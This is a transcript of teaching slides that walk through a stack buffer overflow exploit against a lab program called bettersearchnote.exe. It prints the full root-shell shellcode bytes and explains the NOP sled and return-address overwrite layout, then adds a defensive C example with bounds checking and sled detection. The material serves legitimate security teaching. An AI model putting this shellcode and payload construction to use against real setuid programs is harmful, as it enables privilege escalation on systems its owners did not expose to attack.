Buffer Overflow Walk-Through

Uploaded by senwe, posted 22-Feb-2016 (transcript of a PowerPoint presentation)

Page 1: Buffer Overflow Walk-Through

Page 2

The Code

Page 3

Change the name of the notesearch program in our exploit code to match the course naming convention:

    strcpy(command, "./bettersearchnote.exe\'");

Page 5

Normally, Jose runs the bettersearchnote program to search for notes with keywords of his choosing:

    jose@EC310-VM $ ./bettersearchnote.exe "Life"
    Life is Beautiful

Page 6

The exploit program is crafted to run the program on his behalf, using the function system().

For example, system("ls") would list the contents of the current directory as though it had been run from the command line, like this, except that no one ever enters it at the command prompt:

    jose@EC310-VM $ ls
    unix_basics booksrc work desktop ec310code

Page 7

The exploit program is crafted to run the program on his behalf, using the function system().

system_example.c:

    #include <stdlib.h>   /* declares system() */

    int main() {
        system("ls");
        return 0;
    }

    jose@EC310-VM $ ./system_example.exe
    unix_basics booksrc work desktop ec310code

Page 8

Now, let's look at what the exploit program does. It begins with the standard inclusion of C libraries.

Page 9

The goal of our exploit program is to open a root shell.

The shell code is machine language that opens a shell prompt for the user running the program.

Page 10

First, the set-up…

This is the standard way to start a program and take in command line arguments… But you already knew that

Page 11

Building the stack...

These lines declare the variables to be used in the program. The variables are placed on the stack for the main function:

    i        integer
    ptr      address
    ret      integer
    offset   integer (270)
    command  address
    buffer   address

Page 12

Allocating memory on the heap for our string command, which will later be passed to the function system().

malloc allocates 200 bytes on the heap for the string command. The address of this location on the heap becomes the value of the pointer command (drawn on the slide as 0x__, and labelled &command in the later diagrams). This string will eventually be run with the function system().

Stack so far: i, ptr, ret, offset = 270, command = &command, buffer

Page 13

The bzero function places 200 0x00 bytes starting at the location to which command points, so the 200-byte heap block now reads:

    00 00 00 00 00 00 00 00 ... (200 bytes of 0x00)

Page 14

Building the string command

This copies the string "./bettersearchnote.exe '" into the location pointed to by the pointer command. The heap block now holds that string followed by 0x00 bytes:

    . / b e t t e r s e a r c h n o t e . e x e ' 00 00 00 00 00 00 00 00 ...

Page 15

This string will eventually overflow the bettersearchnote buffer, have the program execute our malicious code, and open a shell.

Next we need to find the address where the command line arguments for bettersearchnote will start. Take the number of bytes in the current string command, up to the null terminator (24 bytes), add this to the address held in the variable command, and store the result in the pointer buffer:

    buffer = &command + 24

Page 16

Specifying our custom return address

This takes the command line argument to create our own custom offset value, but it is not used here (offset stays 270).

Page 17

Specifying our custom return address

This takes the address of i and subtracts the value of offset. The result is placed in the variable ret; this value represents the address of our desired shell code execution entry point:

    ret = &i - 270

Page 18

And place enough copies of our custom return address in the buffer to overwrite the original return address.

Takes the address contained in ret and places it at the address pointed to by buffer. This repeats every 4 bytes for 40 iterations, so the heap block now holds the string followed by 40 copies of &i-270.

Page 19

Now the entire heap block looks like this:

    ./bettersearchnote.exe '   (24 bytes)
    &i-270 x 40                (160 bytes)
    0x00 x 16

Page 20

Next create a buffer of filler commands, called NOPs, to help find the shell code.

memset() sets a byte in memory to the value specified. In this case it puts the value 0x90 at the address pointed to by buffer and into the next 59 addresses as well.

0x90 is machine code for "No Operation," which literally means do nothing.

Page 21

Now the entire heap block looks like this:

    ./bettersearchnote.exe '   (24 bytes)
    0x90 x 60                  (NOP sled)
    &i-270 x 25
    0x00 x 16

Page 22

Copies the shell code into memory after the NOP sled.

Then place our shell code into the buffer immediately following the NOPs.

Page 23

Now the entire heap block looks like this, with the newly inserted shell code after the NOP sled:

    ./bettersearchnote.exe '   (24 bytes)
    0x90 x 60                  (NOP sled)
    31 c0 31 c9 99 b0 a4 cd 80 6a 0b 58 51 51 68 2f 2f 73 68 68 2f 62 69 6e 89 e3 51 89 e2 53 89 e1 cd 80   (shell code)
    &i-270 x 16, then a partial copy of &i-270
    0x00 x 16

Page 24

Concatenates a single quote at the end of the string command. Close the string command with a quote so it is ready to be run by the function system(). The quote now follows the last (partial) copy of &i-270, and the rest of the block remains 0x00.

Page 25

Now the string command is finished and ready for execution. Passed to system(), it is equivalent to typing:

    jose@EC310-VM $ ./bettersearchnote.exe '<60 bytes of \x90><the shell code bytes><copies of &i-270>'

Page 26

Ensuring one of our custom return addresses replaces the original return address

Stack frame of bettersearchnote.exe as drawn on the slide:

    searchstring     (100 characters allotted by bettersearchnote.exe)
    fd
    printing
    user id
    sfp
    return address

100 characters are allotted to searchstring by bettersearchnote.exe. The exploit_notesearch command buffer contains 184 bytes, so it writes 84 bytes beyond the end of searchstring's allotted space, far enough for one of the repeated copies of &i-270 to land on the saved return address.
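To make the defensive side of this last slide concrete, here is an added C example. It is not part of the slides or of the course's bettersearchnote or exploit_notesearch code. It models the 100-character searchstring buffer and shows three things: how many bytes an argument of a given length writes past that buffer (counted the way the slide counts it, 184 - 100 = 84), a bounds-checked replacement for the unbounded strcpy that refuses oversized input instead of copying it, and a simple input check that flags a keyword containing a long run of identical non-printable bytes, which is what a NOP sled looks like from the program's point of view. SEARCH_MAX, overrun_bytes, copy_search_safe, longest_nonprintable_run and keyword_status are names chosen for this example, and the sample inputs in main are constructed.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SEARCH_MAX 100          /* searchstring[100] in bettersearchnote (the slide's figure) */

enum keyword_status { KW_OK = 0, KW_TOO_LONG = 1, KW_NONPRINTABLE = 2 };

/* Bytes written past the end of searchstring when an argument of arg_len bytes is
 * copied in with strcpy(), counted as the slide counts it (184 - 100 = 84).
 * strcpy() then also writes the terminating NUL, one byte further still. */
size_t overrun_bytes(size_t arg_len) {
    return arg_len > SEARCH_MAX ? arg_len - SEARCH_MAX : 0;
}

/* Length of s, but never looks past max bytes (portable stand-in for strnlen). */
static size_t bounded_len(const char *s, size_t max) {
    size_t n = 0;
    while (n < max && s[n] != '\0') n++;
    return n;
}

/* Length of the longest run of identical non-printable bytes in a NUL-terminated
 * argument. A keyword typed by a user scores 0; a sled of 0x90 bytes scores its length. */
size_t longest_nonprintable_run(const char *arg) {
    size_t best = 0, run = 0;
    unsigned char prev = 0;
    for (const unsigned char *p = (const unsigned char *)arg; *p != '\0'; p++) {
        if (isprint(*p)) run = 0;                 /* printable text breaks any run */
        else if (run > 0 && *p == prev) run++;    /* same non-printable byte again */
        else run = 1;                             /* a new run starts here */
        prev = *p;
        if (run > best) best = run;
    }
    return best;
}

/* Bounds-checked replacement for strcpy(searchstring, argv[1]): refuses anything
 * that would not fit together with its NUL, and refuses binary content, instead of
 * copying blindly. dst is always left NUL-terminated, even on rejection. */
enum keyword_status copy_search_safe(char dst[SEARCH_MAX], const char *src, size_t max_run) {
    size_t len = bounded_len(src, SEARCH_MAX);
    dst[0] = '\0';
    if (len >= SEARCH_MAX) return KW_TOO_LONG;            /* no room for the NUL */
    if (longest_nonprintable_run(src) > max_run) return KW_NONPRINTABLE;
    memcpy(dst, src, len + 1);                            /* len + 1 copies the NUL */
    return KW_OK;
}

int main(void) {
    char searchstring[SEARCH_MAX];

    /* Constructed inputs standing in for the argument shapes discussed on the slides. */
    char long_arg[185];
    memset(long_arg, 'A', 184);                 /* 184 bytes, the slide's command-buffer size */
    long_arg[184] = '\0';
    char sled_arg[64];
    memset(sled_arg, 0x90, 60);                 /* 60 x 0x90, the slide's NOP sled length */
    memcpy(sled_arg + 60, "abc", 4);            /* some text after the sled */

    printf("overrun for a 184-byte argument: %zu bytes\n", overrun_bytes(strlen(long_arg)));
    printf("\"Life\":    status %d\n", copy_search_safe(searchstring, "Life", 0));
    printf("184 x 'A': status %d\n", copy_search_safe(searchstring, long_arg, 0));
    printf("60 x 0x90: status %d (longest run %zu)\n",
           copy_search_safe(searchstring, sled_arg, 0), longest_nonprintable_run(sled_arg));
    return 0;
}
```

A max_run of 0 rejects any non-printable byte at all. A small value such as 3 still accepts legitimate UTF-8 keywords, because valid UTF-8 never repeats the same byte more than three times in a row, while a sled of tens of identical bytes is still refused; either way the length check alone already closes the overflow, and the run check only adds an early, loggable signal that the argument was never a search term.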